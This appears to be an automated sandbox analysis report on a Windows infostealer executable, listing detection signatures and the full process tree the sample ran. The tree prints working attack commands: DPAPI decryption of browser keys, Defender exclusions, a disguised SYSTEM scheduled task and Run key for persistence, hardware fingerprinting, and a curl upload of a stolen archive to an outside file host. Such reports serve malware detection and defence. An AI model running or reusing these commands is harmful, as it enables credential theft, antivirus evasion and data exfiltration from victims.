Analysis

  • max time kernel
    93s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 07:09

General

  • Target

    6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

  • Size

    37.6MB

  • MD5

    dbcc5cfb5b91fae4370930affd3d7ef9

  • SHA1

    5e5598375c5abeee8c18c9c28a5138e3763df29b

  • SHA256

    6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef

  • SHA512

    0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584

  • SSDEEP

    393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 11 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
    "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        3⤵
          PID:3552
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -noprofile -
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4416
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dpvs2wch\dpvs2wch.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2380
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EBA.tmp" "c:\Users\Admin\AppData\Local\Temp\dpvs2wch\CSC6D9D7E3A6EF94F89A5B5EE16383EA8FC.TMP"
              5⤵
                PID:4772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3452
          • C:\Windows\system32\curl.exe
            curl http://api.ipify.org/ --ssl-no-revoke
            3⤵
              PID:3440
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5108
            • C:\Windows\system32\tasklist.exe
              tasklist
              3⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:964
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "tasklist"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4548
            • C:\Windows\system32\tasklist.exe
              tasklist
              3⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4192
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"
            2⤵
            • An obfuscated cmd.exe command-line is typically used to evade detection.
            • Suspicious use of WriteProcessMemory
            PID:2536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2500
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"
            2⤵
            • An obfuscated cmd.exe command-line is typically used to evade detection.
            • Suspicious use of WriteProcessMemory
            PID:4588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1596
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1652
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic diskdrive get serialnumber
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1212
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Windows\system32\reg.exe
              reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
              3⤵
                PID:4224
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1920
              • C:\Windows\system32\schtasks.exe
                schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
                3⤵
                • Creates scheduled task(s)
                PID:4572
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2236
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2492
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqvce3rl\zqvce3rl.cmdline"
                  4⤵
                    PID:336
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66B9.tmp" "c:\Users\Admin\AppData\Local\Temp\zqvce3rl\CSCC33968EFC2CC4291915FE8612F8BA90.TMP"
                      5⤵
                        PID:672
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1720
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic bios get smbiosbiosversion
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3516
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3784
                  • C:\Windows\system32\cscript.exe
                    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
                    3⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:1616
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
                      4⤵
                        PID:1304
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3672
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1208
                        • C:\Windows\system32\reg.exe
                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f
                          5⤵
                          • Adds Run key to start application
                          • Modifies registry key
                          PID:4288
                        • C:\Windows\system32\reg.exe
                          reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
                          5⤵
                          • Modifies registry key
                          PID:4292
                        • C:\Windows\system32\curl.exe
                          curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
                          5⤵
                            PID:2584
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4324
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic MemoryChip get /format:list
                        3⤵
                          PID:4592
                        • C:\Windows\system32\find.exe
                          find /i "Speed"
                          3⤵
                            PID:1500
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                          2⤵
                            PID:2728
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic baseboard get serialnumber
                              3⤵
                                PID:3124
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                              2⤵
                                PID:2992
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  3⤵
                                  • Detects videocard installed
                                  PID:444
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                                2⤵
                                  PID:3272
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path win32_computersystemproduct get uuid
                                    3⤵
                                      PID:4520
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                    2⤵
                                      PID:3248
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2892
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
                                      2⤵
                                        PID:3996
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic PATH Win32_VideoController GET Description,PNPDeviceID
                                          3⤵
                                            PID:3552
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
                                          2⤵
                                            PID:1400
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic memorychip get serialnumber
                                              3⤵
                                                PID:856
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                              2⤵
                                                PID:5048
                                                • C:\Windows\system32\curl.exe
                                                  curl http://api.ipify.org/ --ssl-no-revoke
                                                  3⤵
                                                    PID:3600
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                                                  2⤵
                                                    PID:1948
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      3⤵
                                                        PID:684
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                                                      2⤵
                                                        PID:3948
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic cpu get processorid
                                                          3⤵
                                                            PID:4624
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                          2⤵
                                                            PID:1596
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic bios get smbiosbiosversion
                                                              3⤵
                                                                PID:2780
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                                                              2⤵
                                                                PID:1384
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac /NH
                                                                  3⤵
                                                                    PID:628
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                  2⤵
                                                                    PID:3200
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic MemoryChip get /format:list
                                                                      3⤵
                                                                        PID:4696
                                                                      • C:\Windows\system32\find.exe
                                                                        find /i "Speed"
                                                                        3⤵
                                                                          PID:4260
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                        2⤵
                                                                          PID:1828
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic path win32_VideoController get name
                                                                            3⤵
                                                                            • Detects videocard installed
                                                                            PID:2472
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                          2⤵
                                                                            PID:1020
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                              3⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4300
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                            2⤵
                                                                              PID:3180
                                                                              • C:\Windows\system32\curl.exe
                                                                                curl http://api.ipify.org/ --ssl-no-revoke
                                                                                3⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:1052
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                              2⤵
                                                                                PID:1120
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic bios get smbiosbiosversion
                                                                                  3⤵
                                                                                    PID:3924
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                  2⤵
                                                                                    PID:60
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic MemoryChip get /format:list
                                                                                      3⤵
                                                                                        PID:1392
                                                                                      • C:\Windows\system32\find.exe
                                                                                        find /i "Speed"
                                                                                        3⤵
                                                                                          PID:3124
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                        2⤵
                                                                                          PID:3392
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            3⤵
                                                                                            • Detects videocard installed
                                                                                            PID:444
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                          2⤵
                                                                                            PID:2104
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                              3⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4892
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                            2⤵
                                                                                              PID:5080
                                                                                              • C:\Windows\system32\curl.exe
                                                                                                curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                3⤵
                                                                                                  PID:4692
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                2⤵
                                                                                                  PID:2960
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic bios get smbiosbiosversion
                                                                                                    3⤵
                                                                                                      PID:2996
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                    2⤵
                                                                                                      PID:852
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic MemoryChip get /format:list
                                                                                                        3⤵
                                                                                                          PID:3592
                                                                                                        • C:\Windows\system32\find.exe
                                                                                                          find /i "Speed"
                                                                                                          3⤵
                                                                                                            PID:2844
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                          2⤵
                                                                                                            PID:4760
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic path win32_VideoController get name
                                                                                                              3⤵
                                                                                                              • Detects videocard installed
                                                                                                              PID:1724
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                            2⤵
                                                                                                              PID:3920
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                3⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5016
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                              2⤵
                                                                                                                PID:5048
                                                                                                                • C:\Windows\system32\curl.exe
                                                                                                                  curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                  3⤵
                                                                                                                    PID:2720
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
                                                                                                                  2⤵
                                                                                                                    PID:4624
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
                                                                                                                      3⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1716
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                    2⤵
                                                                                                                      PID:1208
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic bios get smbiosbiosversion
                                                                                                                        3⤵
                                                                                                                          PID:3888
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Snfvgqlu.zip";"
                                                                                                                        2⤵
                                                                                                                          PID:1368
                                                                                                                          • C:\Windows\system32\curl.exe
                                                                                                                            curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Snfvgqlu.zip";
                                                                                                                            3⤵
                                                                                                                              PID:4260
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                            2⤵
                                                                                                                              PID:628
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic MemoryChip get /format:list
                                                                                                                                3⤵
                                                                                                                                  PID:4436
                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                  find /i "Speed"
                                                                                                                                  3⤵
                                                                                                                                    PID:1008
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                  2⤵
                                                                                                                                    PID:4092
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                      3⤵
                                                                                                                                      • Detects videocard installed
                                                                                                                                      PID:3604
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                    2⤵
                                                                                                                                      PID:468
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:1052
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                      2⤵
                                                                                                                                        PID:4580
                                                                                                                                        • C:\Windows\system32\curl.exe
                                                                                                                                          curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                          3⤵
                                                                                                                                            PID:2380
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                          2⤵
                                                                                                                                            PID:3552
                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                              wmic bios get smbiosbiosversion
                                                                                                                                              3⤵
                                                                                                                                                PID:3028
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                              2⤵
                                                                                                                                                PID:1696
                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                  wmic MemoryChip get /format:list
                                                                                                                                                  3⤵
